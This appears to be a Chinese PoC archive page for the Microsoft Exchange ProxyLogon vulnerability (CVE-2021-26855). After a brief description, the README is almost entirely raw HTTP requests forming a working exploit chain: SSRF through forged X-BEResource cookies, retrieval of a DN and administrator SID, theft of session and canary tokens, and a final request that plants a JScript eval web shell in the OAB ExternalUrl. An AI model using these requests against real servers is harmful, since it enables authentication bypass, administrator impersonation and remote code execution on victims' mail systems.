关联漏洞
标题:
Microsoft Exchange Server 代码问题漏洞
(CVE-2021-26855)
描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求,并通过Exchange Server进行身份验证。进而扫描内网,获取用户敏感信息。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange
介绍
# cve-2021-26855
```
GET /ecp/x.png HTTP/1.1
Host: 192.168.170.134
Cookie: X-BEResource=localhost~1942062522
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?10
Te: trailers
Connection: close
```
```
# 获取DN值
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?; X-BEResource=EXCHANGE01/autodiscover/autodiscover.xml?a=~1942062522
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Content-Type: text/xml
Content-Length: 343
Connection: close
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>lili@xihongdream.com</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili
```
```
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
X-Requesttype: Connect
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/mapi-http
Content-Length: 142
Connection: close
/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili
S-1-5-21-2706396224-3788800485-1262849735-3585
```
```
# 获取Session,msExchEcpCanary
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 83
Connection: close
<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-3585</s></r>
ASP.NET_SessionId=c897b0d2-4bc1-40ce-a449-9d65d43276e9;
msExchEcpCanary=jwpquzNMEEyRaXH6LhHEJBqGxCzwG9sIO7BTgjy0e4DxjF0s6fVmLcP-InroQca6cPxscclNbS0.;
-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close
<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-500</s></r>
-----------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close
<r at="Negotiate" ln="john"><s>S-1-5-21-2706396224-3788800485-1262849735-5529</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
```
```
# 获取OAB id
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close
{"filter":
{"Parameters":
{
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "",
"SelectedVDirType": "OAB"
}
}
}
-----------------------------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close
{"filter":
{"Parameters":
{
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "",
"SelectedVDirType": "OAB"
}
}
}
----------------------------
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close
{
"filter": {
"Parameters": {
"__type":
"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "",
"SelectedVDirType": "All"
}
},
"sort": {}
}
```
```
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1941962754; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": oabid
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": f"http://x/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["api"],"unsafe");}</script>"
}
}
}
```
文件快照
[4.0K] /data/pocs/6d07a9e05dcffa4cb18e279d96c5384c9164b0b9
└── [7.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。